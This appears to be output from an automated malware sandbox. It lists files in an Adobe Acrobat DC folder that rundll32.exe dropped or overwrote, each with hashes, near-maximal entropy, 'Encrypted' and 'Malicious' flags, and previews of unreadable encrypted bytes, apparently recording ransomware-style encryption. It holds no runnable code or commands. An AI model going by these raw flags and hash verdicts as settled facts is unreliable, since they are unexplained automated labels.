                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):29424
                                              Entropy (8bit):7.9937945295801915
                                              Encrypted:true
                                              SSDEEP:768:YZRwXYc3oAYOSj1iEnEQ9fk44m3pzzGBq85Lbvv:YZOdoR/kQ9844Kaxbvv
                                              MD5:95160956E5F8D8AF2FD560B0069D366A
                                              SHA1:48223D3B78908F73301AE94EFB66510FF30DA47D
                                              SHA-256:8C25CD124472908679332C90F052F2A6FF2A20BAE45D8920638C15D0AEB8B0C7
                                              SHA-512:A3C3B5A569E8514928EE9CE89E67123C219247512ABD0762899161F1AC9048855FCC22BB47A9AAD96FADC452504B56B2C903441B3DC07BB4E06424DDE8FB6B35
                                              Malicious:false
                                              Preview:...F.`.D.....`b..J..".#al...O........8su.....d.7..%q.@9|J..V.. .v:.D2.........".b7\...|..Z..!^.Qr.y.....?...).(!..E.E.).4.e.....!...I.Q...k.' x..}m....|.L.:.,.x..5...eQ..]..1.).......L...D...2(.H}..|LIb.$...2.9 .....+.d...P.1.K.4P..i.....`...z..........Ga..l...}....lJo.T.h.4e..._..6......\..jE..M#.2.z!..{A6.w......9.,.J....4<..k..O.#....Ia........<}.m../...5.P". ,.p.\..?.....Y..^..b....\v..%a....,6..&S.y/K.0../...~h. z.4c..i.V......7..@Q|....A.@E....H......U.<@.c.^.z..3...I.*N.F..8............tG.A. ...`.+...n..Ev.=F..*......R...."$b....n.S...w{..F....$...vU.'].....H!.D.{...b.`.f.....)...].......l..X..+mu..gx.....-..{...)....?^"...o..C(V2CM~....?.U.qw..g-.....D.s..^...Z.D|. ,..z..]H...."...!.....4...H....1.(.....s.f..6.....E9.....H)w.dD.;.D...!.2.?......v}-....D8h...,...Y..f.kr...+j.DZ..x.L.,x..?..C$....PJ..^.I=6.L.;......=%e=..3.hN[G...S8....G.1Au....M....26...=3..o6.aZ...mXz.Kq.HI... +69...O.....coL7..p.Y.x7.Cy...+......\.3.%...p.h{.D1-.=.

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template3.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):26256
                                              Entropy (8bit):7.993052104279359
                                              Encrypted:true
                                              SSDEEP:384:ED113uyNjy0eTrVcHVs4Trp291W8Rt052FLSOK7gBKN0vIX8I4caWX3KCw8YVks8:A3Bu1W+4c91W8rM2Fm7gENU2WUbLio
                                              MD5:CE0D6C68EE278B66773B2900D7351C92
                                              SHA1:6E6351C17BB0BE546C1B94860A45498EF08386D7
                                              SHA-256:0D299068C0867AE34BB7368A964D7B8CAD16E991F13316D4523E7B99678D9C78
                                              SHA-512:6C80ED1FEE5149525428EB76F659A5FB29BC05E840A3958A11CD1C10A4B39B69F1BC27EE4A387DB2F3778294DC415341EC9453872BE5006E7E95853A2816D040
                                              Malicious:false
                                              Preview:...F.`.D.....`b...... ...3..#9...../ck..E.C...OT<..6..py.N_..9{.z..Z..L.......o....<U.....:..l.G.:..*..q.Ud...CNI.jY<...V.X:.).0.\..2....r%.l......|...z....j4.DO[.....?3(A...p.....}U}....D(.f.p.S.........<.D...S*..$>r...1.@8_"..G{+.C....9.M..o9[0...g.OR.6.3..6,bT.3...m..'D..K..)p,...L=...B.fe...Z....>.l.K.R.?.8|...r.#.....!...k..'.:..c.t'.].t..:.Xj....{..p10.......N...........w....`/?~5.E...E..c..H.(x..y....3.0P$...k\... p.r.v..'...l.e/.....p ?...&...u..M.1.}...rj... -xEK..Ah.....<.Lm5..&6bp.8.....wa.:...x./...h:.!......WRF.S...L..]....5a....~3.xw....=.....0n.....<..Y.Kc.......6....&.5.AqMg..)..=K..Es.i.zV..s..+...sq,..=.1co....@. q9.`o.......g..HD.nr.1,...(.a......,g..J.r....!....f..'O^g#..PN..o..df..2GM.VC..F4H...u..^.a.Y..rG.$2...z}....}...zR.v.+..u4...3K....X.m9..~*.\0::b.NUn.PO.%.'{.8n7"u[c.:,.?O......l.j^I.b......'.$..\...<?*@..e...t0s1.v........7!....@4s.z:3..p.^..n.QE.L...R.b.~.3.G......;.(wv......\T.Y.9........+..~....S*.b.*..''z..X

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):134624
                                              Entropy (8bit):7.99862575132114
                                              Encrypted:true
                                              SSDEEP:3072:BDspyTgMiy0HT2TQ28vOigy79kSE/DFOVboFOadhHXfimY:BDspGiyODPkSE/DFOVcFxd1XKmY
                                              MD5:F6ECBF9770E5282B63095E7CB8472551
                                              SHA1:C8726770C058856ABC3E57823F0839B369755135
                                              SHA-256:F58C53E3A38E83CC8104BF3B11E6F03C1CB93EE730FEF72681BE37AB896189B5
                                              SHA-512:2ED8FC455A3FE6465F922A0147C5998878D203F387AE6D96663F662921A0155E79FACCE1CB680671F49AC29EB8D2002AAE7C1298862A5D23F1F56E9BFF965268
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$.......W...>......p..c..:M...o.>.h.....u5.K...4Al.vv8..L.}.B&.t7.~.....v..#Vb.M.H8UF..!.9...`.,......[...:....I!.oa..._.5c8o.......0..UQ.V$:....3Z.8.s..#..a..r$....lb#G....Y...y..Sp...u*."...|..h......v..Qp.m.......A.d..m....g.P.......7..@.....&+8.....m.G)....!.d...~e.......c.t...<.nz..m..a.......H.I%.....b.u$....fF................N.@..a.5....p..I.[.a:..=..0.LB...w.........z<<.Z.|...C.&..].F0No?o`y_t%<..'.O..Y.Ik[-..W*b......%..;...B..^~.EP..[4.....o..B.pu9....L....x.n0.$}...H.z...,Y.~.K.y....M..om;.]...9.Cg....K.O.x.'....6&Z:...)4.y<.3.u..U......F..jx1i..d.H.Hj.bm...i....T..A_Y..C..}.x.x..`.......e......&&f./....VH'C......m>.I..<..9..G..~.dR..c.^C....s....F.....db.'o.e..+.4.2.I...1p.v$....c.bLVd.O.K.Z.,.j.....k..*-o..y.0t..I;n...P...........$q..|x...D}.&..t"...Qz...Mi.....s*..c...N.,.%#."...C.7.^8.........M.;.t.\..T...RTec..!f......M}.+5....t_..K..1&..d|.../6s.Z.:sX.x..r..abF...,.....] ....Yi.....+>&

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\template1.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):61376
                                              Entropy (8bit):7.997689471559768
                                              Encrypted:true
                                              SSDEEP:1536:gkujoGhHrfTfAPsds0uuvxDm6VL2OW/ZrZS:3uEGRYPsdvPXu2
                                              MD5:52FED60101E79581BA1B0BDBFC2979BC
                                              SHA1:294F1F7B555328A44ADB796621513A4E65666E51
                                              SHA-256:8F0DDCF01F3A45F76BCE62BA35D4CAFBCCF99532ABA47DB10144F24A1DAECEDE
                                              SHA-512:72BA8B1881FBBF870BB28A6276268D71109E988F9185071AA4C97E2B21738132DEA1CF6F0F8F54A5714C3ED2EA05D895EDC44A7A9F661433BB58A0A3CA3EDAB8
                                              Malicious:false
                                              Preview:...F.`.D.....`b..`Q".. .U.....3i.ZP.-.k.h........./:?.u.`aO.S.p..Y$.Qg7..75..T..~c5.,.H.#.y..=.T.t...W.....7..$......'.hO=....H..../..X.|\.h....PE..x;}...1$...hP.<.$.r.....@*.1...?.$W....y.}...!..1..K[.(..k,v.O.......".[j8u>..@.:H...9T68...).rz..5JH.....E...C:.|..C...6.o..Sd....U.u..........=/...C....y6......).ld...eWV7.b.2tF .i.......2.............0.1v........})....8x...3_.s..+^..pq.I...v..q.G.D..|.^~.....Y..T....._.......#.t:H.X.0o...*.o`..&......<.z....r$.kry..X-7...>=....g..7h...)....I...p..U..G...P...#.-.5.U....n.gX.s.+I"1r..Af...fg\.a:z.Q..;4...8...jG..D..#s.J.I....dv......e./.k.V^....u....a..........f..H.o.....eZ......9.Tu........#w.T..D....~....D.A.9WL.SZ.......s..f..*LS.|*.......1...xh...L.Edf7.G.._....@X.a...2..W$=v.=.>m.X..6._.~......f.*..j'...u*p5p.[o..mx. xH......).S..!(...8...|+q.^.'. .)2A\4.S.$@.IH..Je........I..*.{R.]...D{.#..N.9[......Fn..E...._.....0nv.S........`H......S...7.l.Ih..e..o.6.F4N6O..h.H.C....`.e..H"<...2..$...,......\

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\AdobeID.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):82080
                                              Entropy (8bit):7.997809007659709
                                              Encrypted:true
                                              SSDEEP:1536:31TRBt9M8zmXKAlAwEhjN7nhI+C9+yy2gWW0GCjcDbzL0COdTwPIVlpjRL6j:HCdKAuxV++yy2gWW0GCjKeOILI
                                              MD5:6E8151A54E79EDEAFC81D1F9117859D4
                                              SHA1:5015030601670AE36E7DFAD1E7E5AF8474E37AB0
                                              SHA-256:A7CD1433EE29A5452E75446828D9526DFB31E1D8B2C5264CE59BF287F5F09228
                                              SHA-512:9BF5A94E131EF8C784A12F6A83D7FAA1CAF06C81FE15C4B1971CB813F4D65F3E0D6D888BAEA1863384C165506DD5F6F7D4F2083AB3ACE58664101DBF4620F233
                                              Malicious:false
                                              Preview:...F.`.D.....`b. ..........s...O...g....c.Q...a.'.F.KY.,sM.?.i..Z.6..?.BY.6.V.%...HM(.t.|e...lOcn.....,.-'...n..n..1c..*...4p.1...nO3{...$.........fx.P......>.^.O.7c..y....{...O.:.I.s#.S..Y.|....t.!5Q........O..)VU$.e..]..._:b!Tv...mE..............4.!....T4(...[Z=45O.@...N.4..a.QYF_..._..%..0..Yy.....^.G..>..>>.N..\l.B.q.~q`B......MQ.6H...cS........[..MR;...5/^......X...2..@.....w7.....gwV..*.nz..t.+...r.`@.K.........:..g..>.z....p..Y.TEO.Y...(.BI......4...C..x.K!q....o..i....67#c.q..0S;.m.\..}/.$.y......4.D...W.....63....cpS.:...D.......v..R....q..y....VC.>.I.t+.h.x {.h..Q.cBr...{!R"=.i.Q..H_..J..Uu| .<a6..c..).....>G..(...+.".U..1U..h..........@......S........IW..*.z...y..r.k..-.I....c..W3..2.....a.=..V..,..vW....K.g].7.....E.Jw:d....1.G....g.S.[..g..xX....i.....Rq...3R2v.E...?..$.Z..9.+'.%i..<..}..YW..'.U<0...B.)BJ..x...~)..3z..n...B}...^./...X..n.....ITG...3......z..h.[...W|...]l..kkT>[......l.e..oH3.......V.....(...'.*..

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\DefaultID.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):80656
                                              Entropy (8bit):7.9977699912307445
                                              Encrypted:true
                                              SSDEEP:1536:wS5p4qmT5QbhY4if3xZJSQaYk8gv9nCWvnUcr5HsHYsazbmvkZtFSQkJoKL:wS5Hm1Qbi1f9kd5CWfUGBsanmutFKL
                                              MD5:8A0F5763A193B5E1906ED5264716E38D
                                              SHA1:8DE9BBA1AAD670E4C21FEB73BE8C97C1879DF230
                                              SHA-256:08BBA2B1332FB619A619D38A04A63CE06FDDA017289D4A906BBAF3C4A00AD397
                                              SHA-512:85BB6E66CB9EEEEC8915D26921DA2A17C4C21E7AABB1CE302E6CC1079BB7646651F6334D32A6DAC744D2AE53D904BD06926BB96F6561A6370D74A425E6760825
                                              Malicious:false
                                              Preview:...F.`.D.....`b. ..........s...g@@.E.....8.z...w..fP;..W..p=x.a.........L..'..~N.~..g....j8......G....o..4|}R..83D.P...c=....Tim.q...]..E..#.....y..l[......>...*g...{R...U....@{..2...............3.a.]....o...#.U../.Sa.."(.....A."|$@.....lYa.)J8...>\...j.k~.a.......I.%nJ......Dn.R....F......v.|....H|.g".K.hG:L.%....[...W+J*.<(,g....W..12. .].-..=....D/.X......H......Y.qSz.2.t.tj..g.E92*.9.R...A .Nf..5....v..[r..S....ZIh.._.......5{.>....m.....S..k...O.?......UdB.....0.Or.j.J...;.p.........hl..Z.q*8....{.0.b...R...;..\ .~...0.....Y.BN..O|.....v....Y.aP7wa..E.....m[...VT.F...}%7..D"...,.....r.+.-j.|....Q..o...R..ST.sU..........A.D9.%.f.;,...!Ae.Cb..........v.7........l.Y.e..,x..uC.bO...=....,.Z.....;.o..@.G...(..L..4|...C5..h*&.:M.........3..^...Xx{...B.l.N..iY{..]j"#.i.*|..h..<v'.Nri5u.@....."..~.3.7s...U....N........MU..+r.@E.m..p...Z..I...X...t#...f..."Iy..h.".W8..g.G."....(f.wO.(.U........ac...[v...1].....u....T')..'"...w..>:C.@..v.

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):470496
                                              Entropy (8bit):7.999600932060286
                                              Encrypted:true
                                              SSDEEP:12288:oCzgUEQ2Zv8bFoA0cEShHbcQAKRcriASaQ1BdJFz4GL:5zgUz2xgYjQP1ArQRJB
                                              MD5:407A88803B9B4311B0178109F43E169E
                                              SHA1:A1A72F410F6C31BC3BBF75F7E6C924F5E22359E6
                                              SHA-256:EA42D2C2F8C9E8446ADAAFE5A3FBD7D6B55E6D9894915FE7F6FD9106EAB1B4BB
                                              SHA-512:E2E1FEB89DCAD36211C795FDE02AF42DDCC8967BF1BE9FF89D9DD1F18421E9CA11F5032FA3CDB0953BB9437CACF452F33E7A4C3595175A762087B17649B12A7F
                                              Malicious:true
                                              Preview:.......?...:....!Rkl...b.sl6....l!e..u8...n....2e?..E........~..l`.wn[.k.....R.cRT..|.Wz_._...s.R..U..=-P.m....].. .S.c......vJ.!B.+0.`....S.......A...@.b]....K...t.0>.;..2>...r.....;\.(.m.o....\O....ts.<.Z@....<...z.] &....0U.R..8..I.....*.L{....aB(.W3.g.....(v/>..af..p.sz.^....[.1RN.wL.q.(...8j..|..s..D...RpU....%.....O".x[.5^.....mQ.u4.b.g.+.../gz...1].....b.....d......d.p.mL3a..:<...G.:...U.... j.!...|...dU..c.....j.-^.']. $....].=...5Z..W..A.T..Y.^.Z.r."ut.B..BZ.X.W.k...E.Yl..K........8..|q...N.......bb.tF/..S..lVT....g~.t..X%fb.]...(`hA...7s....f.d.)....$...+..gy........>,.G..7..R."..'5v.......=.!....V.B...n{I...._..,a).5......`..X.ep-.%.iV:...`...o.:...R.._..;.l.@...=..M..v.n...I......$U.o..f..%,...9.n.Q..r.A.......6..z;%.3.1....XD/9..AcwV......'....#...CpBs:..0L.x\I.b.......5...=..<....%..[Xh.....&...`"(.;..]..`F..L*..p..x....A.k.!(..'Y....{.7.....b....)L..=q.E..6..Z....%rR..P.`.j*..8U.U.M.`..,.....&.).iL..ZwHF.i......."|..:M

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\PDFSigQFormalRep.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):468208
                                              Entropy (8bit):7.999579674249822
                                              Encrypted:true
                                              SSDEEP:12288:W8PaSGtzDjooZneLubX/VrSYJ6YeyMf9aiOTfueRSMfgV:BP12ULEPV+YC3MiOTmeJfgV
                                              MD5:A4055AD8922627878D8C056AED2F3662
                                              SHA1:6CD95282459AFB993D736DD62C5C5C7C467DD44E
                                              SHA-256:230F01CF35541F2F9B8D7DE86AB251B29D6803B18EAC524EED2B18E30BF75A10
                                              SHA-512:92B7ABFCFB4C6B5A25568CC6141AC27153B848496F347F61F895E2CD80F7E5ED03A06B608BB673403B2E6A4E312BB54F268F645557C77E04283B08EA1194D741
                                              Malicious:false
                                              Preview:...F.`.D.....`b..x..6..(.(..D*E...c.YNk...M*3.l:x.I......@C7.2..H... .I...&.G:...>nj..0U. |...".P3....\...*.ck.h..>z._...@..7Y....f0.K...L<ue'.>.{.Z<....].({L....u...^.......(..a$j....@&......`......i.n....-.@.....S..&.@W..}I\s....D.1!s..6.)-.....oV......@..}._....!....pG6A...>-..l...^...GP......{p.Ecy=N.Q.!.Y.4...|..f2....;..FX...5...:..A.....W*f..k..d.7...e7...K...G.4.1/...I~.....4.)B.D5.....N......T.uv...I.].+R..n.h.`7Um.+.! GA.Qz..q.u.|x..e.oL.5.t......:49m.[:F.'.j..I...0...\..B...].E.......xt1*.^.%...h...,cQ..&B(.n[...c:......'..j#.....O.)..c...M.......?C.... ]!A..@....g.....^Q..@5.".w+pDZ^...E*.>.C.dM.....nq.'.. .....`..@..l)E.g.LU.Bq........+..Xa..%D9.Cz...z.....:3.?OO.......z..u.l.K..6.q..O..|... z.|..&.,.14.a.O......"@.].;..,..|....l...2j.;1F|....;..O.G....N,.....x...".|....,.g.q?*........*.S...6^....?......g.A:.;....@..y."\.......'...8+n)....`....K....S..\..y.*Z.JZo..5.I......r....5..Vs...p.....c..l_..X1..s.f..!...c."

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):218288
                                              Entropy (8bit):7.999139092098637
                                              Encrypted:true
                                              SSDEEP:6144:RJfLpR2Uj+gjaYG3+8vdP9achzFiN8PV2fP99qb:z5+g7s7scV2fl9qb
                                              MD5:D2A467B7EE8334CE7D470C6CAF59C964
                                              SHA1:08C15C17F368D0B786367939320A05EDFA28B6D3
                                              SHA-256:C3AB6E43559E6DD4D7DC4B8B2FB56F7DD86AE99CC92D3FED334EC204F5203827
                                              SHA-512:ECCA8B90CBF26EB3A52DFC7C6874A1A0531AB18C66148DDF05253BE51F57F3D3EBF8B4E470A86F9867365B05412327B56519746A204DCF470760F8BB84C0CC30
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$........X.../....S}s..l..}..j.B..j.Z.+...<X.$..X(w..`x.s3.....*.......>.5..F......2<$.[.....J1............e.........8.=.*l..#....6..:.8>...J..r..9.!...]).|..........b@.P....~.*G..)^.,#A...m...#.+........[..`.....f.C.....bv..5.d.P..b.ag......_..WOJ..].G8.-B.....t. ...`h...<..U.i....Bd..]..5.d.J...?...^WM`k9]..-..%.#..f.2.]....q.z...o..p.....I.3.....7..b....;.[l`.0....rP...{.,W.+!.A..X.....|..1;..R...oH.fp.!..un2'....Yj6O...P+._.._...9 o..d.@.s.!...]}0..Yf..'B.._;%..{!'..-..HV$'Sh.G...8..v..'.j{.Y..'-....D...1.o.?GF.h.W...[q....@7...%)r...1,l......oU{.Mq=...X-uJ$.S...j..>.....y..-.....d.G.q.l.9/....C.jq.. ;..C...&.4,..*v...5....=..W..bJH.u.8...bRF..h1v4.e.S.U...`.).k.Q.."..No..........I.......A....g..|...b.g/.W.5.....t.]>....P.s._...].W.^..2.mOd.*..3..Rt0....K.@.K...A......A..f......^.C..../.G.\...1.....N1....L!4R.B...!F......!+.?..R.'.M....F..o.. ....}'....*.T.M.C...8.......p.v........k&.J.

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):24032
                                              Entropy (8bit):7.991100735770633
                                              Encrypted:true
                                              SSDEEP:384:JhbKQUPqNRcEmVFz28/URiBZIHlZZQWwWXAPd9oRLEsUHLzl+du9r7cOUwaWe+x/:JRUKRq+RAKFZ6Wrwr/l+dIUjWtxtzRL
                                              MD5:DAAA1639021BCAAD8132409497DC8AEF
                                              SHA1:C65F56EB7C2C686EC469038D61C3EEE78B7394B3
                                              SHA-256:40008041E15A4988B0AEEBFAE080B117EF3DDE5C635BD2D9BBFB63190CB052FE
                                              SHA-512:50FC0CCF4502B031A7BBFE275DB2260E5C9C50E91B0B77505C4657E54DFC5295F9D08A8FE4A4C28D42E444AAAAA63E01024E8A0A7D83BD48C7C027D2F69DB650
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$........V.[N.... sg.".Z...........H.B...B..P.kIq..-......5&.[Ywlj..R.c...b.&...K.m.>.#.O.1L6....._:.....XR.....+[i[.*.O....a<I.D.. F...9Su."<.R.q2b...8S....7X.;"Q#.v..F$."...j.PL..t....a'*..c.qY._...'......'......U3.f..H$...u..E!..h(..=.4E6.E.&.K.il..p..c..?./..K.../.v......D..x.u5o..P...vsN.Y....|.GQ.0......b...r....6P..'..J)V.ow.{...P.x......C?..T3s.?w.>....{...k..;5.iA..O....C+P..&`.1TR.........\Qr|....2..1$..*..../mP.....=F...J.....%\e..Ly..F..H...Q.e6j37=.R.2xC...C.K8.I..#.1.u........EJhi..C.p..........m..kZ.+.8.u*F.l&.$......T..[...d...AR]-..>:.O\ .:...>H-..y@.....g..D..f..+rhC|..m.W...=.{......rj......{.O..+,J......:..s..h...........z.........*EH_a....h..."j...8....XW..Dj.'.Ju...19b..&-...G:J...x..8~.+/.Z...];g..X..0...I[|R...)q...zK..#..(=..~/.).o.N\s./..|....t.c..tm..!#K........gRKd`4..-..'.]2/!....H.z..H7.5.u.}.^..1...`...i..K.i..........yl.W..Nb.h.M.i...R.&...f...Q.O`.JBS.....7.l|J..>...

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\A12_CrossLarge_24_N.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):4112
                                              Entropy (8bit):7.954089205286475
                                              Encrypted:false
                                              SSDEEP:96:dE5iezg+yJPdfq1J9nyYEYjMS5kibtFALsUSFvGrhwS:1ayyJ5RECr5ki5USBGH
                                              MD5:FE10689BE3C5B5671930BB570705D454
                                              SHA1:FE0C64E2E094EFC2675A56BEBB10929D29F83F11
                                              SHA-256:CA43EB08A41EB39DF086167654758D93B0EF62923396153DD391E079589FD1A6
                                              SHA-512:2F1019C4697903A00A9875B462C306B18DBFF9AECB611B696412058708AC33391E359684AFC435988E812944C32B7CEFD74543D33CE034E254F20252C2BB1D87
                                              Malicious:false
                                              Preview:......\....t.2x2.P... ..{w.b.D.=...Y. ..M..SL.....3..E..|......\k...f-~d.............-.di..7....s.6...#.N.S...\R6.Vb...]._..Q.\.y~Lb....%..- v..!....}.d.4mS.h...&.....9.W...5#....J..AG..A...g.gf.....c..T.y_...+.../.@..1.....@Im.....l..Y...x..A..Y....<..a......G..w;..... .L......].z.C..#..J.6..}.?.P.P.y..e...y%.R..>..h.#.K[nJ.r......-.].Y......6.h%g\...A...+.#N4BMIM...`.e_\....S.Mv.(K.GS.....[.lhh..}..i+"..q.. A.b...!...3.ow..;...R.....%B.I.b.l..!.Z..o..!.....C..1.;{?...... ..U.3. `...c.:...e*Z..g..j..-.y..s.D.{...*v...._&.....2 Y..T...F./.Qb...b..^dK.=z.R....%...5..e.HR]{........:./..gG<..c.k...4.Yf.....}?.1...:<...}(..k.D.. r|.e.....2....)a......@.......\IS..>;....[..u.5..!..4<-..=xz\..F ......)c......h.....*P;`_V.......z.-...g..-..NT.....'.....b..:....l.....7.TN.Qb....I..Z..r...].V.V$........(.rP_.pm$.K[....q...........*.s>...M..*....QV.._i...,.I!.$kD"..2.......<ye.......J...:s1._W.ezS.*..O.$....2....r.%.DQ.....J.R..,.n..>.1.{...YZ;.

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):146784
                                              Entropy (8bit):7.998702680903867
                                              Encrypted:true
                                              SSDEEP:3072:psazJP/xInesmZC6foGSbMxuE1xjejCOJJrHspGaWZH27jF5LCgUBnCPk:psaz5/xsiLabejUJyIalF5Vgz
                                              MD5:F72F621443D1190B74EA5EF318830681
                                              SHA1:0B688E564A0D505D3A9A7380380C39992FD327A6
                                              SHA-256:B8A023DE75FC68488077D7D42913C3EB505063CF4B23887F8148A4424C85595A
                                              SHA-512:61E03D13DAB174880178D2EABB0967A0B7E279DA0F7192BE8F8EB6C02BC9E69FDB4B6FCEAF4CAE8B4EC9FCC2B8EEDF3B9DFC570DFE483C0E70983AB5F3BA0AE5
                                              Malicious:false
                                              Preview:.5R.n.$....P.^........;.d.:".t...;.._.`..Z4......e..}..H.?&N.{.cj.F..... n.a...q...u8+_.KN.x$t.hd..)..I.N).{M..6M..K4.^..N.=.I..k....[....7.Ga...y..%i.Ss.......3...q50...NiJ.{Bg.x.8.Ra.6.~y>...f.O...Y.......Z.g^..].=.'.z.3...v.py...........EB.s...T.I..$...D9..q.o.i.r;N...?.. .g.,.r(...s=.vn.. ...c..q`...L..$...oG..3;c......'....Z......@Xp...b../fX...T......L.^]5...M...\...s;a#.7..P...t1..A...C}][U^$|.;.....{..Aq.........#.?.}..;.X.B.Ud........J...@.\.V..!.....^.y...N..._..v.....>.S.+2.......r..<GKI$.i.c.E.U&........V..h.....e..u..F...bE...9.c#._-Y.]Un..6......D..m[5d...(.. .s.,......}..#..Ho..H..031.kO<.@.o...q.N..;KB"5...x.......o.....m.T.v.R.Nfk.B.z.*S..M...OIf..Z...^]b5.......*!..q..>...[Z.......Vp.tI*..G...N.....t....i......."......$....g*.zQ....x.q..9V.w?.8a.ca..".........@.....'..........:...#k.6chb....#.V..~..a>......DL...LH..1.....ri@=.'.T|..._.$D.9UY....n.(Q|.5.:.f.D..k.c9j..(..!....?ieH.-1.Ls. ..C..r%jmC....I....5UA..E.......

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:OpenPGP Secret Key
                                              Category:dropped
                                              Size (bytes):310544
                                              Entropy (8bit):7.999458594093277
                                              Encrypted:true
                                              SSDEEP:6144:YemWqh1sBMFyRejO0jz7Gd5QZWbIm43gsWkNcLsLKh/0nGK/DLua:YtP+myAvjzad2U7eTWzL6q/0nGKLL1
                                              MD5:0050FA53DB29D55D8878E171CDBA1987
                                              SHA1:667E459129032F43F36C6F3BD7E8CE4117ECC44D
                                              SHA-256:DCA24B8C07F6F6A4BAD5462F66853A3C5FD3DCE204A9C2B75FA19FBD4052F613
                                              SHA-512:FA20BB046467D306F5E5C766303CCC4D2CB0E6A48AA2F79C3ED64AF2E329A082C73BCD8A4F92E8F312DD65F2D13BD6A52610DD4A8ED05980D3EFB6969EB4C5A5
                                              Malicious:false
                                              Preview:..:.=A.+...,..V..w...`N.....xgB..m.3....>. 0..r........0.......Bo.u0.g....C...SQ.U.Ix....'.|.-.p...F.65[.z..1.4G..y.p].C...To%.8L.l.M.g..A..v..8....P../..`5J|.g.@.....S..Fx.M.*.........g..[....<9...A..DY.....X..z8..6...h.....l..u.79..'...H...|m..y....b..lW|4N..(...W3.........m.M..,7N}.kXz..(.tk....<s..1.p.[..o..a<..2.eK..d..W..164..)H.R..h^...Tw~....&Y.........h."q.[8.....C\.V.,.\V.!x...z..:.f.R%. #..I......k.....<%%.k..$.n..p.u4.....pi.....7../\........S.>.Y.&..Cd.[..O.K..7.2*...c..pkg.p...1.B..7xS..].UD.vg"NC.T{%.........wQ.'wD..p.........`..c.a..L.|.......q.i.....(.\.....p..v.r9.%...q9O.=eL............t..P<..A)r,F..]Y.......<\...kK.....cn"..H7.(.._.$.vJ..v{..gA&O..!...n0q....ET....T.3.^.u...PF.6......{ ....n..@.......#...W.........:9>.(..y6_..x..u.`..R.?.j.).....J.`...8{Y.GW.2Y.Zi..Fif.....x....p..R..f*..+x-.4.p....i.ekk...I.3...o../b.v..R.7.BR.+..../C.nh...Lpd..G.M...)..Ly#......<Rf2....^.:.<E.).9.or.P.."cw..'|.GeuDT.=.Z+.!.....k.c;.fG.C|

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:OpenPGP Secret Key
                                              Category:dropped
                                              Size (bytes):426016
                                              Entropy (8bit):7.999613056073564
                                              Encrypted:true
                                              SSDEEP:6144:gdPAxLjVwqv6wP0AhmUK+W4p1QxMFmi2rH1FV4VyK0oNkHLh1+APzUcFTbV:p1D6yE4p132rVFg0oerh1iWTbV
                                              MD5:03ED00BF86E536B513F7EF53414FE98F
                                              SHA1:88D72037B36AC669ABB30E2C657927A73A168113
                                              SHA-256:54696F64DF1168D271D8F0010C07D9E792AAD553D793711D8F9C1AB910BF1813
                                              SHA-512:E84C8E64958BD60C088D63F72330D1D5C051CB1F2F91F7EC20CD71590D3C1A53D1820F1208DA4E3767FAE756E059F10121CA1ACCB91E1B486C7F68C4E424593E
                                              Malicious:false
